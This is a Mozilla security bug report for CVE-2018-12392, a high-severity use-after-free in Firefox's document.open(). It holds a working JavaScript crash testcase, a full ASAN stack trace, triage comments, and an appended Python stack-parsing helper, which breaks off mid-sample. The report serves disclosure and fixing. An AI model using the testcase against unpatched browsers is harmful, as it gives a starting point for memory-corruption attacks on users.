Closed Bug 1492823 (CVE-2018-12392) Opened 2 years ago Closed 2 years ago

js::AssertSameCompartment failure in nsHTMLDocument::Open

Categories

(Core :: DOM: Core & HTML, defect, P1)

64 Branch
defect

Tracking


VERIFIED FIXED
mozilla64
Tracking Status
firefox-esr60 63+ verified
firefox62 --- wontfix
firefox63 + verified
firefox64 + verified

People

(Reporter: nils, Assigned: smaug)

Details

(Keywords: csectype-uaf, sec-high, Whiteboard: [post-critsmash-triage][adv-main63+][adv-esr60.3+])

Attachments

(5 files)

The following testcase crashes the latest ASAN build of Firefox 64.0a1 (BuildID=20180919100043). It looks like we have to win a race to trigger the issue, so it might require a few reloads/restarts.

<script>
// Trigger chain (see the ASAN stack below): onload -> synchronous XHR spins a
// nested event loop -> the WebSocket error event fires inside it and calls
// document.writeln(), which implicitly calls document.open() -> the delayed
// focus event is fired while that open() is still on the stack -> the focus
// handler calls document.open() again, re-entrantly.
var reloadurl, o707, o715, o731, x;

function spin() {
    // Synchronous XHR: blocks in send() and spins a nested event loop.
    var x = new XMLHttpRequest();
    x.open("POST", "https://mozilla.org", false);
    try { x.send("X"); } catch (e) {}
}

function start() {
    reloadurl = location.href;
    o707 = window.document;
    o715 = new WebSocket("ws://0.0.0.0");   // connection fails, onerror fires later
    o731 = o707.createElement('template');
    o707.onfocus = fun1;
    o715.onerror = fun0;
    spin();
}

function fun0() {
    // Runs inside the nested loop; writeln() implies document.open().
    o707.writeln("x");
}

function fun1() {
    // Fired from the delayed focus event during the first document.open().
    x = o731.content;                        // the template's content document
    o707.execCommand('subscript', false, null);
    o707.open();                             // re-entrant document.open()
    window.top.setTimeout("window.top.location.href='" + reloadurl + "'", 400);
}
</script>
<body onload="start()"></body>


ASAN output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28511==ERROR: AddressSanitizer: ILL on unknown address 0x55b844692b1f (pc 0x55b844692b1f bp 0x7ffd03e5ea70 sp 0x7ffd03e5e900 T0)
    #0 0x55b844692b1e in MOZ_CrashPrintf /builds/worker/workspace/build/src/mfbt/Assertions.cpp
    #1 0x7eff42067828 in fail /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:52:9
    #2 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:68
    #3 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:82
    #4 0x7eff42067828 in checkImpl<JSObject *> /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:194
    #5 0x7eff42067828 in check<JSObject *> /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:203
    #6 0x7eff42067828 in js::AssertSameCompartment(JSContext*, JSObject*) /builds/worker/workspace/build/src/js/src/jsfriendapi.cpp:418
    #7 0x7eff3a1724dd in mozilla::dom::ReparentWrapper(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2279:3
    #8 0x7eff3aeb9ee3 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1532:11
    #9 0x7eff39b73a75 in mozilla::dom::HTMLDocument_Binding::open(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:215:53
    #10 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #11 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #12 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #13 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #14 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #15 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #16 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #17 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #18 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #19 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #20 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #21 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #22 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #23 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #24 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #25 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #26 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #27 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #28 0x7eff3727d8e1 in FocusBlurEvent::Run() /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2077:12
    #29 0x7eff36c18186 in AddScriptRunner /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5674:13
    #30 0x7eff36c18186 in nsContentUtils::AddScriptRunner(nsIRunnable*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5681
    #31 0x7eff371bb3e3 in nsFocusManager::FireFocusOrBlurEvent(mozilla::EventMessage, nsIPresShell*, nsISupports*, bool, bool, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2250:5
    #32 0x7eff371ba714 in nsFocusManager::FireDelayedEvents(nsIDocument*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1081:9
    #33 0x7eff3714d537 in FireOrClearDelayedEvents(nsTArray<nsCOMPtr<nsIDocument> >&, bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9016:11
    #34 0x7eff3714cd10 in nsIDocument::UnsuppressEventHandlingAndFireEvents(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9332:5
    #35 0x7eff36cca940 in nsGlobalWindowInner::FreeInnerObjects() /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:1211:13
    #36 0x7eff36d4a455 in nsGlobalWindowOuter::SetNewDocument(nsIDocument*, nsISupports*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:1973:19
    #37 0x7eff3aeb9b20 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1498:22
    #38 0x7eff3aebebb4 in nsHTMLDocument::WriteCommon(JSContext*, nsTSubstring<char16_t> const&, bool, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1768:38
    #39 0x7eff3aebdc20 in nsHTMLDocument::WriteCommon(JSContext*, mozilla::dom::Sequence<nsTString<char16_t> > const&, bool, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1686:5
    #40 0x7eff39b77c81 in mozilla::dom::HTMLDocument_Binding::writeln(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:421:9
    #41 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #42 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #43 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #44 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #45 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #46 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #47 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #48 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #49 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #50 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #51 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #52 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #53 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #54 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #55 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #56 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #57 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #58 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #59 0x7eff3a991ea6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
    #60 0x7eff3a945dc0 in mozilla::DOMEventTargetHelper::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/DOMEventTargetHelper.cpp:185:5
    #61 0x7eff3a9ba039 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:213:13
    #62 0x7eff3ca34422 in mozilla::dom::WebSocket::CreateAndDispatchSimpleEvent(nsTSubstring<char16_t> const&) /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1955:3
    #63 0x7eff3ca434c9 in mozilla::dom::WebSocketImpl::DispatchConnectionCloseEvents() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1920:18
    #64 0x7eff3ca47bb7 in mozilla::dom::CallDispatchConnectionCloseEvents::Run() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:262:21
    #65 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
    #66 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #67 0x7eff3c927bb2 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:334:25
    #68 0x7eff3c927bb2 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937
    #69 0x7eff3c925b80 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2768:11
    #70 0x7eff39412c7f in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1277:9
    #71 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #72 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #73 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #74 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #75 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #76 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #77 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #78 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #79 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #80 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #81 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #82 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #83 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #84 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #85 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #86 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #87 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #88 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #89 0x7eff3d5cbed8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1167:7
    #90 0x7eff40438f83 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7089:21
    #91 0x7eff40433ff7 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6882:7
    #92 0x7eff4043d447 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #93 0x7eff357eddd5 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1309:3
    #94 0x7eff357ec9bc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:852:14
    #95 0x7eff357e84a9 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:741:9
    #96 0x7eff357ead82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:627:5
    #97 0x7eff357ec4e4 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #98 0x7eff331cc492 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #99 0x7eff37141107 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8471:18
    #100 0x7eff37141107 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8393
    #101 0x7eff3711adfb in nsIDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5252:3
    #102 0x7eff372871cb in applyImpl<nsIDocument, void (nsIDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1178:12
    #103 0x7eff372871cb in apply<nsIDocument, void (nsIDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1184
    #104 0x7eff372871cb in mozilla::detail::RunnableMethodImpl<nsIDocument*, void (nsIDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1229
    #105 0x7eff32f0e3e5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
    #106 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
    #107 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #108 0x7eff3415ec33 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #109 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #110 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #111 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #112 0x7eff3cd4d5a3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #113 0x7eff411dedde in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:939:22
    #114 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #115 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #116 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #117 0x7eff411ddf03 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:765:34
    #118 0x55b84461fb91 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #119 0x55b84461fb91 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:287
    #120 0x7eff550bdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #121 0x55b84454ef3c in _start (/home/nils/fuzzer3/firefox/firefox+0x2cf3c)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ILL /builds/worker/workspace/build/src/mfbt/Assertions.cpp in MOZ_CrashPrintf
==28511==ABORTING
Attached file ASAN output
compartment mismatch during wrapper reparenting
Group: core-security → dom-core-security
Jason, can you see if there could be something that needs fixing in XHR/Web Sockets here?
Component: DOM: Core & HTML → DOM: Networking
Flags: needinfo?(jduell.mcbugs)
Priority: -- → P1
I think this is unlikely to be related to XHR. The reason XHR is on the stack is that that's one of the ways that web content can trigger a nested event loop (which is presumably part of the issue here). We need somebody familiar with XPConnect / dom bindings to investigate.
Flags: needinfo?(jduell.mcbugs) → needinfo?(overholt)
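The comment above reads the stack by locating the nested event loop that sync XHR spins. As an added example (not part of this bug or the Mozilla tree), here is a small Python triage helper that parses ASAN-style frame lines like the ones in the trace above and reports, for each nested-loop frame, which caller was blocked in it and which task ran inside it, plus every non-plumbing function that appears twice on the stack (i.e. was re-entered) and whether a nested loop sits between the two invocations. The sample trace is a hand-copied subset of the frames above with paths shortened, and the PLUMBING list is an assumption drawn from those frames.

```python
"""Triage helper: nested event loops and re-entered functions in an ASAN stack."""
import re
from collections import Counter

# One ASAN frame line: "#N 0xADDR in FUNCTION LOCATION"
FRAME_RE = re.compile(
    r"^\s*#(?P<idx>\d+)\s+0x[0-9a-fA-F]+\s+in\s+(?P<func>.+?)\s+(?P<loc>\S+)$")

# Frame name marking a nested event loop spun on the main thread (as in the trace above).
NESTED_LOOP_MARKER = "SpinEventLoopUntil"

# Assumed list of JS-engine, binding and event-dispatch plumbing, taken from the frames
# above: these recur on every Gecko stack, so their repeats are not evidence of re-entrancy.
PLUMBING = (
    "js::", "JS::", "Interpret", "CallJSNative", "CallFromStack",
    "binding_detail::GenericMethod", "EventHandlerNonNull::Call",
    "JSEventHandler::HandleEvent", "EventListenerManager::", "EventTargetChainItem::",
    "EventDispatcher::", "ProcessNextEvent", "MessageLoop::Run", "RunInternal", "RunHandler",
)


def short_name(func):
    """'void mozilla::dom::Foo::Call<nsISupports*>(...)' -> 'mozilla::dom::Foo::Call'."""
    return re.split(r"[(<]", func, maxsplit=1)[0].split()[-1]


def parse_frames(trace_text):
    frames = []
    for line in trace_text.splitlines():
        m = FRAME_RE.match(line)
        if m:
            frames.append({"idx": int(m.group("idx")), "func": m.group("func"),
                           "short": short_name(m.group("func")), "loc": m.group("loc")})
    return sorted(frames, key=lambda f: f["idx"])  # #0 is the innermost frame


def is_plumbing(name):
    return any(p in name for p in PLUMBING)


def nearest_non_plumbing(frames, loop_idx, direction):
    """Closest non-plumbing frame outward (+1, towards main: who was blocked) or
    inward (-1, towards the crash: what ran inside the loop) from a nested-loop frame."""
    side = [f for f in frames if not is_plumbing(f["short"])
            and (f["idx"] > loop_idx if direction > 0 else f["idx"] < loop_idx)]
    if not side:
        return None
    pick = min(side, key=lambda f: f["idx"]) if direction > 0 else max(side, key=lambda f: f["idx"])
    return pick["short"]


def analyze(trace_text):
    frames = parse_frames(trace_text)
    loops = [f["idx"] for f in frames if NESTED_LOOP_MARKER in f["func"]]
    nested = [{"loop_frame": l,
               "blocked_in": nearest_non_plumbing(frames, l, +1),
               "ran_inside": nearest_non_plumbing(frames, l, -1)} for l in loops]

    # A non-plumbing function on the stack twice was re-entered. If a nested loop sits
    # between the two invocations, the inner one is an event delivered while the outer
    # was blocked; otherwise it is direct re-entry (script ran from inside the outer call).
    reentered = {}
    for name, n in Counter(f["short"] for f in frames).items():
        if n < 2 or is_plumbing(name):
            continue
        idxs = [f["idx"] for f in frames if f["short"] == name]
        reentered[name] = {"frames": idxs,
                           "via_nested_loop": any(idxs[0] < l < idxs[-1] for l in loops)}
    return {"innermost": frames[0]["short"] if frames else None,
            "nested_loops": nested, "reentered": reentered}


# Constructed sample: a subset of the frames from the trace above, paths shortened.
SAMPLE_TRACE = """\
#6 0x7eff42067828 in js::AssertSameCompartment(JSContext*, JSObject*) js/src/jsfriendapi.cpp:418
#7 0x7eff3a1724dd in mozilla::dom::ReparentWrapper(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) dom/bindings/BindingUtils.cpp:2279:3
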